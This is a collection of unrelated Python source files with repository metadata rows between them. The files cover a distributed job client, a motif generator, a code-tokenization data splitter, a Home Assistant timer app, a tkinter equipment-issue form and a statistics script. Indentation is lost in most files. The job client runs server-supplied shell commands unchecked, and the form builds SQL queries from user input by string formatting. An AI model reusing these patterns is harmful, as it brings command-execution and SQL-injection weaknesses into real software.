complete = int (i / perc) * percent
print( "%s%% complete" % complete)
if not name.endswith('/'):
outfile = open(os.path.join(dir, name), 'wb')
print( 'File:',os.path.join(dir, name))
outfile.write(zf.read(name))
outfile.flush()
outfile.close()
# set permission to u+rwx (448)
os.chmod(os.path.join(dir, name) , 448)
return True
def _createstructure(self, file, dir):
self._makedirs(self._listdirs(file), dir)
def _makedirs(self, directories, basedir):
""" Create any directories that don't currently exist """
for dir in directories:
curdir = os.path.join(basedir, dir)
if not os.path.exists(curdir):
os.mkdir(curdir)
def _listdirs(self, file):
""" Grabs all the directories in the zip structure
This is necessary to create the structure before trying
to extract the file to it. """
zf = zipfile.ZipFile(file)
dirs = []
for name in zf.namelist():
if name.endswith('/'):
dirs.append(name)
dirs.sort()
return dirs
def post_multipart(host, selector, fields, files):
    """
    Post fields and files to an http host as multipart/form-data.
    """
    content_type, body = encode_multipart_formdata(fields, files)
    # Choose between http and https connections; http.client expects a bare
    # host[:port], so strip any scheme that is still attached
    if host.startswith('https'):
        h = http.client.HTTPSConnection(host.replace('https://', ''))
    else:
        h = http.client.HTTPConnection(host.replace('http://', ''))
h.putrequest('POST', selector)
h.putheader('content-type', content_type)
h.putheader('content-length', str(len(body)))
h.endheaders()
h.send(body)
response = h.getresponse()
return response.read()
def encode_multipart_formdata(fields, files):
"""
fields is a sequence of (name, value) elements for regular form fields.
files is a sequence of (name, filename, value) elements for
"""
BOUNDARY_STR = '----------ThIs_Is_tHe_bouNdaRY_$'
CRLF = bytes("\r\n","ASCII")
L = []
for (key, value) in fields:
L.append(bytes("--" + BOUNDARY_STR,"ASCII"))
L.append(bytes('Content-Disposition: form-data; name="%s"' % key,"ASCII"))
L.append(b'')
L.append(bytes(value,"ASCII"))
if files:
for (key, filename, value) in files:
L.append(bytes('--' + BOUNDARY_STR,"ASCII"))
L.append(bytes('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename),"ASCII"))
L.append(bytes('Content-Type: %s' % get_content_type(filename),"ASCII"))
L.append(b'')
L.append(value)
L.append(bytes('--' + BOUNDARY_STR + '--',"ASCII"))
L.append(b'')
body = CRLF.join(L)
content_type = 'multipart/form-data; boundary=' + BOUNDARY_STR
return content_type, body
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
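# Shape of a call (hypothetical values), mirroring the upload done further below:
#   post_multipart('server:8080', '/upload',
#                  [('job_id', '42'), ('project', 'demo'), ('job_status', 'd')],
#                  [('upload_file', 'results.txt', b'...file bytes...')])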
def get_project_parameters():
usage = "usage: ./%prog [options]"
parser = OptionParser(usage=usage)
parser.add_option("-s", "--server", dest = "server", help = "Server address:port")
parser.add_option("-p", "--project", dest = "project", help = "Project name (all: choose between all projects, random: randomly choose a project)")
parser.add_option("-l", "--list", action = "store_true", dest = "list", help = "List of projects")
parser.add_option("-n", "--jobs-number", dest = "nj", help = "Number of jobs to compute")
parser.add_option("-u", "--unique", action = "store_true", dest = "unique", help = "Launch if not already running")
parser.add_option("-v", "--version", action = "store_true", dest = "ver", help = "Print client version")
parser.add_option("-a", "--after", dest = "t1", help = "No job computation after (i.e 600 for 6:00 AM)")
parser.add_option("-b", "--before", dest = "t2", help = "No job computation before (i.e 2000 for 8:00 PM)")
(options,args) = parser.parse_args()
if options.ver:
sys.exit(0)
if options.unique:
unique = True
else:
unique = False
print('unique',unique)
server = options.server if options.server else SERVER
print("\nQuerying available projects for your platform...")
try:
response = urllib.request.urlopen("{server}/projectsList?clientVersion={clientVersion}&system={system}".format(server=server, clientVersion=__version__, system=platform.system()))
response = response.read().decode('utf-8').strip()
except:
return True, "Error! Check the server URL"
remoteProjectsList = json.loads(response)
print("Available projects for your OS: {}".format(",".join(remoteProjectsList)))
if options.list:
return True, ""
projectName = options.project
if projectName:
print("project name:", projectName)
if projectName in remoteProjectsList:
if options.nj is not None:
nj = int(options.nj)
else:
if options.t1 and options.t2:
nj = 1e6
else:
while True:
try:
nj = int(input("\nNumber of jobs: "))
break
except ValueError:
print("Not a valid number. Try again...")
return False, (projectName, nj, server, unique)
else:
return True, 'project not found'
else:
return True, 'No project'
def execute(projectName, server):
"""
download job to execute
return return_code, msg
return_code True if error
"""
jobDir = ""
job_id = -1
print("Getting job from server...")
try:
response = urllib.request.urlopen("{server}/get_job?project={projectName}&system={system}".format(server=server, projectName=projectName, system=platform.system()))
#print(response.read())
#print ("Response:", response)
# Get the URL. This gets the real URL.
#print( "The URL is: ", response.geturl())
# Getting the code
#print( "This gets the code: ", response.code)
if response.code != 200:
return True, "Download error {}".format(response.code)
#print( "The Headers are: ", response.info())
# Get all data
job = json.loads(response.read().decode('utf-8').strip())
if "msg" in job:
print(job["msg"])
raise Exception(True, job["msg"])
job_id = job["job_id"]
print("Job id: {}".format(job_id))
command = json.loads(job["command"])
results_file = job["results_file"].replace("###JOB_ID###", str(job_id) )
data = job["data"].replace("###JOB_ID###", str(job_id))
program = json.loads(job["program"])
if platform.system() in command:
system_command = command[platform.system()].replace("###JOB_ID###", str(job_id))
else:
raise Exception(True, "No jobs for your OS ({})".format(platform.system()))
# check if project dir exists
jobDir = "{}_{}".format(projectName, job_id)
if not os.path.isdir(jobDir):
os.makedirs( jobDir )
os.chdir(jobDir)
if program:
if platform.system() in program:
system_program = program[ platform.system() ]
if system_program:
for file_ in system_program:
response = urllib.request.urlopen("{server}/data/{file}".format(server=server, file=file_))
program_file_content = response.read()
with open( file_, "wb") as fh:
fh.write( program_file_content )
                    # check if the file is compressed
if ".zip" in file_:
unzipper = unzip()
unzipper.extract(file_, ".")
# project dir exists cd
else:
raise Exception(True, "directory {} already exists".format(jobDir))
if data:
try:
response = urllib.request.urlopen("{server}/data/{data}".format(server=server, data=data))
data_file_content = response.read()
except:
raise Exception(True, "File not found: {}".format(data))
if b"###JOB_ID###" in data_file_content:
data_file_content = data_file_content.replace(b"###JOB_ID###", str(job_id) )
with open( data, "wb") as outFile:
outFile.write( data_file_content)
# check if data is compressed file
if ".zip" in data:
unzipper = unzip()
unzipper.extract(data, ".")
p = subprocess.Popen(system_command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True )
out, error = p.communicate()
#print(out)
#print(error)
#out = out.decode('utf-8')
#error = error.decode('utf-8')
if error:
# update DB with error in job_status field
raise Exception(True, error.decode('utf-8'))
#return True, "Error: {}".format(retcode)
if results_file and os.path.isfile(results_file):
try:
fields = [('job_id', str(job_id)), ('project', projectName), ("job_status", "d")]
files = [('upload_file', results_file, open(results_file, "rb").read())]
post_multipart(server.replace('http://', ''), '/upload', fields, files)
except:
raise Exception(True, "Error uploading file")
else:
if not os.path.isfile(results_file):
raise Exception(True, "Results file not found")
# remove job directory
os.chdir(sys.path[0])
shutil.rmtree(jobDir)
return False, "Job completed"
except Exception as error:
# send error to server if job
print(error.args[1])
print('job_id', job_id)
if job_id != -1:
fields = [('job_id', str(job_id)), ('project', projectName), ('job_status', 'error: {}'.format(error.args[1]))]
post_multipart(server.replace('http://', ''), '/upload', fields, None)
# delete job directory (if any)
os.chdir(sys.path[0])
if os.path.isdir(jobDir):
print("deleting job directory")
shutil.rmtree(jobDir)
print("Job directory deleted")
print("final except")
return error.args
# read parameters
result, parameters = get_project_parameters()
if result:
print(parameters)
sys.exit()
projectName, jobsMaxNumber, server, unique = parameters
if unique and os.path.isfile(tempfile.gettempdir() + os.sep + "distrib_client_lock"):
print("distrib client is already running. If not delete the {} file".format(tempfile.gettempdir() + os.sep + "distrib_client_lock"))
sys.exit()
# write lock file
try:
with open(tempfile.gettempdir() + os.sep + "distrib_client_lock", "w") as f_out:
f_out.write(str(os.getpid()))
except:
print("Writing lock file failed")
jobNumber = 0
while True:
try:
result, msg = execute(projectName, server)
except:
result = True
msg = "Undefined error"
# return to script directory
os.chdir(os.path.dirname(os.path.realpath(__file__)))
if result:
print(msg)
break
else:
jobNumber += 1
if jobNumber >= jobsMaxNumber:
break
print( "{} job(s) executed".format(jobNumber))
try:
os.unlink(tempfile.gettempdir() + os.sep + "distrib_client_lock")
except:
print("Deleting lock file failed")
| olivierfriard/jobs-distribution | client.py | client.py | py | 13,291 | python | en | code | 1 | github-code | 13 |
22996498097 | # -*- coding: utf-8 -*-
"""
Created on Wed Apr 17 16:37:39 2019
"""
import numpy as np
def cal_ICPC(pos):
if pos >= 0.0001:
y = pos*np.log2(pos/0.25)
else:
y = 0
return y
def find_possible(ICPC):
possible_range = []
for ii in range(0,10001):
i = ii/10000
if ii == 10000:
i = 1
if ii == 0:
i = 0
max_ICPC = cal_ICPC(i)+cal_ICPC(1-i)
min_ICPC = cal_ICPC(i)+cal_ICPC((1-i)/3)*3
if max_ICPC >= ICPC - 0.00001 and min_ICPC <= ICPC + 0.00001:
possible_range.append(i)
first = np.random.choice(possible_range)
possible_range_2nd = []
for iii in range(0, 10001 - int(np.round(first*10000))):
i1 = iii/10000;
max_ICPC2 = cal_ICPC(i1) + cal_ICPC(1-first-i1) + cal_ICPC(first)
min_ICPC2 = cal_ICPC(i1)+cal_ICPC((1-first-i1)/2)*2 + cal_ICPC(first)
if max_ICPC2 >= ICPC - 0.0001 and min_ICPC2 <= ICPC + 0.0001:
possible_range_2nd.append(i1)
second = np.random.choice(possible_range_2nd)
if second == 0.0:
second = 0
if second == 1.0:
second = 1
remain_total = 1 - first - second
if remain_total == 1.0:
remain_total = 1
if remain_total == 0.0:
remain_total = 0
remain_ICPC = ICPC - cal_ICPC(first) - cal_ICPC(second)
for kk in range(0, int(np.round(remain_total*10000)+1)):
k = kk/10000
if k == 0.0:
k = 0
if k == 1.0:
k = 1
if cal_ICPC(k) + cal_ICPC(remain_total - k) <= remain_ICPC + 0.001 and cal_ICPC(k) + cal_ICPC(remain_total - k) >= remain_ICPC - 0.001:
third = k
forth = np.round(10000*(remain_total - third))/10000
if forth == 0.0:
forth = 0
if forth == 1.0:
forth = 1
break
switch = [third,forth]
t = np.random.choice([0,1])
third = switch[t]
forth = switch[int(1-t)]
return first,second,third,forth
def motif_results(ML, ICPC):
motif_table = []
for i in range(0, ML):
this = find_possible(ICPC)
motif_table.append(this)
return motif_table
| Zhongyihhh/CS412-Gene-Mutation-Detection | Step1_3.py | Step1_3.py | py | 2,262 | python | en | code | 0 | github-code | 13 |
20210567209 | import os
import random
import sys
import source.tokenization.tokenization as tokenization
def save_data(data, label, meta, path, name):
print(path)
foutd = open(path + name + "_remadd.txt", 'w', encoding='utf-8', errors='ignore')
for i, d in enumerate(data):
foutd.write(" ".join(d).replace('\n', '').replace('\t', '') +
'\t' + " ".join(label[i]).replace('\n', '').replace('\t', '') + '\n')
foutm = open(path + name + "_meta.txt", 'w', encoding='utf-8', errors='ignore')
for m in meta:
foutm.write(m + '\n')
# https://stackoverflow.com/questions/23289547/shuffle-two-list-at-once-with-same-order
def unison_shuffled_copies(a, b, c):
try:
assert len(a) == len(b)
assert len(a) == len(c)
d = list(zip(a, b, c))
random.shuffle(d)
a, b, c = zip(*d)
return a, b, c
except:
print("Error: Files with different length")
print(len(a))
print(len(b))
print(len(c))
sys.exit()
def get_training_testing(data, labels, meta_list, valid_size=20000, test_size=20000, shuffle=False):
"""
Split the data between, training, valid and test set. Shuffled for training
:param data:
:param labels:
:param meta_list:
:param valid_size:
:param test_size:
:param shuffle:
:return:
"""
if shuffle:
data, labels, meta_list = unison_shuffled_copies(data, labels, meta_list)
train_data = data[:-(test_size + valid_size)]
train_labels = labels[:-(test_size + valid_size)]
train_meta = meta_list[:-(test_size + valid_size)]
valid_data = data[-(test_size + valid_size):-test_size]
valid_labels = labels[-(test_size + valid_size):-test_size]
valid_meta = meta_list[-(test_size + valid_size):-test_size]
test_data = data[-test_size:]
test_labels = labels[-test_size:]
test_meta = meta_list[-test_size:]
return ([train_data, train_labels, train_meta],
[valid_data, valid_labels, valid_meta],
[test_data, test_labels, test_meta])
def main_nocontext(init_dir):
"""
Parse and clean data without context.
:param init_dir: dir with the original training data.
:return:
"""
saved_data_path = init_dir + "/../nocontext/train/"
print("Save data in :", saved_data_path)
# Check if path exist
if not os.path.exists(saved_data_path):
os.makedirs(saved_data_path)
rem_path = os.path.join(init_dir, 'rem.txt')
add_path = os.path.join(init_dir, 'add.txt')
meta_path = os.path.join(init_dir, 'meta.txt')
rem_lines = open(rem_path).read().split('\n')
add_lines = open(add_path).read().split('\n')
meta_lines = open(meta_path).read().split('\n')
rem_toks = [tokenization.tokenize(line) for line in rem_lines]
add_toks = [tokenization.tokenize(line) for line in add_lines]
[train_data, train_labels, train_meta], \
[valid_data, valid_labels, valid_meta], \
[test_data, test_labels, test_meta] = get_training_testing(rem_toks, add_toks,
meta_lines,
shuffle=True)
save_data(train_data, train_labels, train_meta, saved_data_path, '_train')
save_data(valid_data, valid_labels, valid_meta, saved_data_path, '_valid')
save_data(test_data, test_labels, test_meta, saved_data_path, '_test')
def main_context(init_dir):
"""
Parse and clean data with context.
:param init_dir:
:return:
"""
saved_data_path = init_dir + "/../context/train/"
print("Save data in :", saved_data_path)
# Check if path exist
if not os.path.exists(saved_data_path):
os.makedirs(saved_data_path)
rem_path = os.path.join(init_dir, 'rem.txt')
add_path = os.path.join(init_dir, 'add.txt')
context_path = os.path.join(init_dir, 'context.txt')
meta_path = os.path.join(init_dir, 'meta.txt')
rem_lines = open(rem_path).read().split('\n')
add_lines = open(add_path).read().split('\n')
context_lines = open(context_path).read().split('\n')
meta_lines = open(meta_path).read().split('\n')
rem_toks = []
rem_toks_init = [tokenization.tokenize(line) for line in rem_lines]
add_toks = [tokenization.tokenize(line) for line in add_lines]
context_toks = [tokenization.tokenize(line) for line in context_lines]
print(rem_toks_init[0])
print("CONTEXT")
print(context_toks[0])
for i in range(0, len(rem_toks_init)):
try:
if context_toks[i] and rem_toks_init[i]:
rem_toks.append(rem_toks_init[i] + ['<CTX>'] + context_toks[i])
elif rem_toks_init[i]:
rem_toks.append(rem_toks_init[i])
elif context_toks[i]:
rem_toks.append(['<CTX>'] + context_toks[i])
else:
rem_toks.append([" "])
except:
continue
[train_data, train_labels, train_meta], \
[valid_data, valid_labels, valid_meta], \
[test_data, test_labels, test_meta] = get_training_testing(rem_toks, add_toks,
meta_lines,
shuffle=True)
save_data(train_data, train_labels, train_meta, saved_data_path, '_train')
save_data(valid_data, valid_labels, valid_meta, saved_data_path, '_valid')
save_data(test_data, test_labels, test_meta, saved_data_path, '_test')
def main(data_dir, context):
print("Start tokenizing: ", context)
if context == "context":
main_context(data_dir)
if context == "nocontext":
print("Nocontext")
main_nocontext(data_dir)
main(sys.argv[1], sys.argv[2])
| lin-tan/CoCoNut-Artifact | source/tokenization/generate_data.py | generate_data.py | py | 5,770 | python | en | code | 48 | github-code | 13 |
3848241398 | import json
from dataclasses import dataclass
from datetime import datetime, timezone
import time
from ulanzi import UlanziApp
BAR_COLOR_PAUSED = '#deb764'
BAR_COLOR_RUNNING = '#aadb72'
BAR_COLOR_BG = '#373a40'
class UlanziTimerDisplay(UlanziApp):
"""
App that listens to HASS timer events and dynamically displays them
"""
TIMER_STARTED = 'timer.started'
TIMER_FINISHED = 'timer.finished'
TIMER_CANCELLED = 'timer.cancelled'
TIMER_PAUSED = 'timer.paused'
TIMER_RESTARTED = 'timer.restarted'
@dataclass
class Timer:
status: str
remaining: int
total: int
icon: str
def get_output(self):
if self.remaining >= 3600:
text = time.strftime('%-H:%M:%S', time.gmtime(self.remaining))
else:
text = time.strftime('%-M:%S', time.gmtime(max(0, self.remaining)))
result = {
'icon': self.icon,
'text': text,
'progressBC': BAR_COLOR_BG,
'progressC': BAR_COLOR_RUNNING if self.status == 'running' else BAR_COLOR_PAUSED,
'progress': int(100 - (self.remaining / self.total * 100)),
}
if self.remaining < 30:
result['duration'] = 30
return result
def initialize(self):
super().initialize()
self.timers = {}
self.tick_timer_handle = None
try:
self.custom_icons = self.args.get('custom_icons', {})
self.ignore_timers = self.args.get('ignore', [])
except KeyError as err:
self.error("Failed getting configuration {}".format(err.args[0]))
return
timer_events = [
UlanziTimerDisplay.TIMER_STARTED,
UlanziTimerDisplay.TIMER_FINISHED,
UlanziTimerDisplay.TIMER_CANCELLED,
UlanziTimerDisplay.TIMER_PAUSED,
UlanziTimerDisplay.TIMER_RESTARTED,
]
self.listen_event(self.trigger, timer_events)
def _get_seconds_until(self, timestamp):
"""Get the amount of seconds until the given timestamp"""
now = datetime.now(timezone.utc)
then = datetime.fromisoformat(timestamp)
return int((then - now).total_seconds())
def trigger(self, event_name, data, kwargs):
self.log(f"Received event {event_name}: {data}")
timer_id = data['entity_id']
timer_name = timer_id.split('.')[-1]
if timer_id in self.ignore_timers or timer_name in self.ignore_timers:
return
timer = self.get_state(timer_id, attribute='all')
icon = self.custom_icons.get(timer_name, self.icon)
if event_name in (UlanziTimerDisplay.TIMER_STARTED):
self.timers[timer_id] = UlanziTimerDisplay.Timer(
status='running',
remaining=self._get_seconds_until(timer['attributes']['finishes_at']),
total=self._get_seconds_until(timer['attributes']['finishes_at']),
icon=icon,
)
else:
obj = self.timers.get(timer_id)
if obj is None:
self.log(f"Received event {event_name} for unknown timer {timer_id}")
return
if event_name == UlanziTimerDisplay.TIMER_RESTARTED:
obj.remaining = self._get_seconds_until(timer['attributes']['finishes_at']) + 1
obj.status = 'running'
elif event_name == UlanziTimerDisplay.TIMER_FINISHED:
del self.timers[timer_id]
timer_name = timer['attributes']['friendly_name']
self.send_notification(f"{timer_name} ist fertig!", icon=icon)
elif event_name == UlanziTimerDisplay.TIMER_CANCELLED:
del self.timers[timer_id]
elif event_name == UlanziTimerDisplay.TIMER_PAUSED:
obj.status = 'paused'
if not self.timers:
self.delete_app()
self.cancel_timer(self.tick_timer_handle)
self.tick_timer_handle = None
elif self.tick_timer_handle is None:
self.tick_timer_handle = self.run_every(self.tick, 'now', 1)
def tick(self, *args, **kwargs):
app_pages = []
for timer in self.timers.values():
if timer.status == 'running':
timer.remaining -= 1
app_pages.append(timer.get_output())
self.call_service('mqtt/publish', topic=self.mqtt_app_topic, payload=json.dumps(app_pages))
| ict/ulanzi-awtrix-appdaemon | ustopwatch.py | ustopwatch.py | py | 4,535 | python | en | code | 1 | github-code | 13 |
34129706092 | from src.dependencies.imports import *
class Item_issue(LabelFrame):
def __init__(self,master,db):
super(Item_issue,self).__init__(master)
self.grid()
labelfont=('times',16,'bold')
self.config(bd=10,bg="#bdc3c7",font=labelfont)
self.master=master
self.depts=self.master.depts
self.machines=[]
self.db=db
self.create_widgets()
def create_widgets(self):
row=0;
self.config(text="Item Issue/Return Details",
relief=FLAT,
labelanchor=N,
padx=30,
pady=10)
textfont=('verdana',10)
errorfont=('verdana',8)
Label(self,text="Type: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.iss_type=BooleanVar()
self.iss_type.set(False)
Radiobutton(self,text="Issue",
font=textfont,bg="#bdc3c7",
variable=self.iss_type,
command=self.issue_form,
value=True).grid(row=row,column=1,
sticky=W)
self.ret_type=BooleanVar()
self.ret_type.set(False)
Radiobutton(self,text="Return",
font=textfont,bg="#bdc3c7",
variable=self.ret_type,
command=self.return_form,
value=True).grid(row=row,column=2,
sticky=W)
row+=1
self.type_err=StringVar()
self.type_err.set("")
Label(self,textvariable=self.type_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Machine ID: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.id=StringVar();
self.id.set("")
self.id_opt=combo(self,self.machines,self.id,True)
self.id_opt.grid(row=row,column=1,sticky=W+E)
for chl in self.id_opt.children.values():
chl.bind('<Control-space>',self.new_equipment)
self.fetch=Button(self,text="Fetch",fg="white",
bg="#34495e",font=textfont,
command=self.item_return,width=8,
state=DISABLED)
self.fetch.grid(row=row,
column=2,
sticky=E)
row+=1
self.id_err=StringVar()
self.id_err.set("")
Label(self,textvariable=self.id_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Issue Date: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.issue=Entry(self,
state=DISABLED)
self.issue.grid(row=row,
column=1,
sticky=W+E)
self.issue_select=Button(self,text="Calendar",fg="white",
bg="#34495e",font=textfont,
command=self.selectdate,width=8,
state=DISABLED)
self.issue_select.grid(row=row,
column=2,
sticky=E)
row+=1
self.issue_err=StringVar()
self.issue_err.set("")
Label(self,textvariable=self.issue_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Issued by: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.issby=Entry(self,
state=DISABLED);
self.issby.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
self.issby_err=StringVar()
self.issby_err.set("")
Label(self,textvariable=self.issby_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Issued to: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.issto=Entry(self,
state=DISABLED);
self.issto.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
self.issto_err=StringVar()
self.issto_err.set("")
Label(self,textvariable=self.issto_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Return Date: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.ret=Entry(self,
state=DISABLED)
self.ret.grid(row=row,
column=1,
sticky=W+E)
self.ret_select=Button(self,text="Calendar",fg="white",
bg="#34495e",font=textfont,
command=self.selectdate,width=8,
state=DISABLED)
self.ret_select.grid(row=row,
column=2,
sticky=E)
row+=1
self.ret_err=StringVar()
self.ret_err.set("")
Label(self,textvariable=self.ret_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Returned to: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.retto=Entry(self,
state=DISABLED);
self.retto.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
self.retto_err=StringVar()
self.retto_err.set("")
Label(self,textvariable=self.retto_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Returned on: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.reton=Entry(self,
state=DISABLED)
self.reton.grid(row=row,
column=1,
sticky=W+E)
self.reton_select=Button(self,text="Calendar",fg="white",
bg="#34495e",font=textfont,
command=self.selectdate,width=8,
state=DISABLED)
self.reton_select.grid(row=row,
column=2,
sticky=E)
row+=1
self.reton_err=StringVar()
self.reton_err.set("")
Label(self,textvariable=self.reton_err,
font=errorfont,
fg="red",bg="#bdc3c7").grid(row=row,
column=1,
columnspan=2,
sticky=W+E)
row+=1
Label(self,text="Remarks: ",
font=textfont,bg="#bdc3c7").grid(row=row,
column=0,
sticky=N+S+W+E)
self.rem=Text(self,width=40,height=5,wrap=WORD)
self.rem.grid(row=row,column=1,columnspan=2,sticky=W+E)
row+=1
Button(self,text="SUBMIT",bg="#34495e",font=textfont,
command=self.submit,fg="white",
width=12).grid(row=row,
column=1,
pady=15)
Button(self,text="RESET",bg="#34495e",font=textfont,
command=self.reset,fg="white",
width=12).grid(row=row,
column=2,
pady=15)
self.pack(anchor=CENTER,expand=1)
def selectdate(self):
X=__import__('calendar_ui')
self.expiry_date=X.CalendarWidget(self.master)
#self.expire.insert(0,self.expiry_date.selection())
def new_equipment(self,event):
self.pack_forget()
X=__import__("src.dependencies.Equipment",fromlist=('Equipment'))
self.z=X.Equipment(self.master,self.db,False)
t=Thread(target=self.call_pack,args=())
t.setDaemon(True)
t.start()
def call_pack(self):
try:
while self.z.winfo_exists():
sleep(0.1)
pass
self.pack(anchor=CENTER,expand=1)
except:
pass
def item_return(self):
self.db.connect()
cur=self.db.execute_sql("""select * from item_issue
where machine_id='%s' and issue='1';"""
%(self.id.get()))
data=list(cur.fetchall())
self.issue.config(state=NORMAL)
self.issby.config(state=NORMAL)
self.issto.config(state=NORMAL)
self.ret.config(state=NORMAL)
self.issue.insert(0,data[0][2])
self.issby.insert(0,data[0][3])
self.issto.insert(0,data[0][4])
self.ret.insert(0,data[0][5])
self.rem.insert("1.0",data[0][8])
self.issue.config(state=DISABLED)
self.issby.config(state=DISABLED)
self.issto.config(state=DISABLED)
self.ret.config(state=DISABLED)
self.db.close()
def issue_form(self):
self.machines=[]
dpt=[]
for items in self.depts:
tmp=(items.split(" - "))
dpt.append(tmp[0])
if len(dpt)==1:
dpt="("+dpt[0]+")"
else:
dpt=str(tuple(dpt))
x=self.db.execute_sql("""select machine from equipment
where issuable='1'
and department in %s;"""%(dpt))
z=list(x.fetchall())
for mach in z:
self.machines.append(mach[0])
x=self.db.execute_sql("""select machine_id from item_issue
where issue='1';""")
z=list(x.fetchall())
for mach in z:
self.machines.remove(mach[0])
self.id_opt.value_config(self.machines)
self.id.set("")
self.ret_type.set(False)
self.issue.config(state=NORMAL)
self.issto.config(state=NORMAL)
self.issby.config(state=NORMAL)
self.ret.config(state=NORMAL)
self.issue_select.config(state=NORMAL)
self.ret_select.config(state=NORMAL)
self.issue.delete(0,END)
self.issby.delete(0,END)
self.issto.delete(0,END)
self.ret.delete(0,END)
self.rem.delete("1.0",END)
self.retto.delete(0,END)
self.retto.config(bg="white",state=DISABLED)
self.retto_err.set("")
self.reton.delete(0,END)
self.reton.config(bg="white",state=DISABLED)
self.reton_err.set("")
self.reton_select.config(state=DISABLED)
self.fetch.config(state=DISABLED)
def return_form(self):
self.machines=[]
cur=self.db.execute_sql("""select machine_id from item_issue
where issue='1';""")
z=list(cur.fetchall())
for mach in z:
self.machines.append(mach[0])
self.id_opt.value_config(self.machines)
self.id.set("")
self.iss_type.set(False)
self.issue.delete(0,END)
self.issue.config(bg="white",state=DISABLED)
self.issue_err.set("")
self.issto.delete(0,END)
self.issto.config(bg="white",state=DISABLED)
self.issto_err.set("")
self.issby.delete(0,END)
self.issby.config(bg="white",state=DISABLED)
self.issby_err.set("")
self.issue_select.config(state=DISABLED)
self.ret_select.config(state=DISABLED)
self.ret.delete(0,END)
self.ret.config(bg="white",state=DISABLED)
self.ret_err.set("")
self.retto.config(state=NORMAL)
self.reton.config(state=NORMAL)
self.reton_select.config(state=NORMAL)
self.fetch.config(state=NORMAL)
def submit(self):
comp=BooleanVar()
comp.set(True)
msg=StringVar()
if not self.iss_type.get() and not self.ret_type.get():
self.type_err.set("Select Type")
comp.set("False")
else:
self.type_err.set("")
comp.set("True")
if self.iss_type.get():
msg.set("This field cannot be empty")
check_ent(self.issby,comp,msg,self.issby_err)
msg.set("This field cannot be empty")
check_ent(self.issto,comp,msg,self.issto_err)
msg.set("Invalid Issue Date")
check_date(self.issue,comp,msg,self.issue_err)
msg.set("Invalid Return Date")
check_date(self.ret,comp,msg,self.ret_err)
msg.set("Return date should be after Issue date")
comp_date(self.issue,self.ret,comp,msg,self.ret_err)
if self.ret_type.get():
msg.set("This field cannot be empty")
check_date(self.reton,comp,msg,self.reton_err)
msg.set("This field cannot be empty")
check_ent(self.retto,comp,msg,self.retto_err)
msg.set("Machine ID cannot be empty")
check_stvar(self.id,self.machines,comp,msg,self.id_err)
try:
self.db.connect()
if comp.get():
if self.iss_type.get():
self.db.execute_sql("""insert into item_issue
values(%d,'%s','%s','%s','%s','%s',NULL,NULL,'%s');"""
%(self.iss_type.get(),
self.id.get(),
self.issue.get(),
self.issby.get(),
self.issto.get(),
self.ret.get(),
self.rem.get("1.0",END)
))
else:
self.db.execute_sql("""update item_issue
set issue=%d,return_on='%s',ret_accepted_by='%s',remark='%s'
where machine_id='%s' and issue='%s';"""
%(self.iss_type.get(),
self.reton.get(),
self.retto.get(),
self.rem.get("1.0",END),
self.id.get(),
self.ret_type.get()
))
self.reset()
except pw.IntegrityError as e:
print(e)
except:
self.db.close()
print("Connection error")
def reset(self):
self.destroy()
Item_issue(self.master,self.db)
| SohailChamadia/Digital-Assets | src/dependencies/Item_issue.py | Item_issue.py | py | 17,273 | python | en | code | 1 | github-code | 13 |
14917171951 | import plotly.figure_factory as ff
import pandas as pd
import csv
import plotly.graph_objects as go
import statistics
import random
data = pd.read_csv("StudentsPerformance.csv")
finalData = data["reading score"].tolist()
mean = sum(finalData) / len(finalData)
std_dev = statistics.stdev(finalData)
median = statistics.median(finalData)
mode = statistics.mode(finalData)
first_std_dev_start, first_std_dev_end = mean-std_dev, mean+std_dev
second_std_dev_start, second_std_dev_end = mean-(2*std_dev), mean+(2*std_dev)
third_std_dev_start, third_std_dev_end = mean-(3*std_dev), mean+(3*std_dev)
fig = ff.create_distplot([finalData], ["reading scores"], show_hist=False)
fig.show()
list_of_data_within_1_std_dev = [result for result in finalData if result > first_std_dev_start and result < first_std_dev_end]
list_of_data_within_2_std_dev = [result for result in finalData if result > second_std_dev_start and result < second_std_dev_end]
list_of_data_within_3_std_dev = [result for result in finalData if result > third_std_dev_start and result < third_std_dev_end]
print("Mean of this data is {}".format(mean))
print("Median of this data is {}".format(median))
print("Mode of this data is {}".format(mode))
print("Standard deviation of this data is {}".format(std_dev))
print("{}% of data lies within 1 standard deviation".format(len(list_of_data_within_1_std_dev)*100.0/len(finalData)))
print("{}% of data lies within 2 standard deviations".format(len(list_of_data_within_2_std_dev)*100.0/len(finalData)))
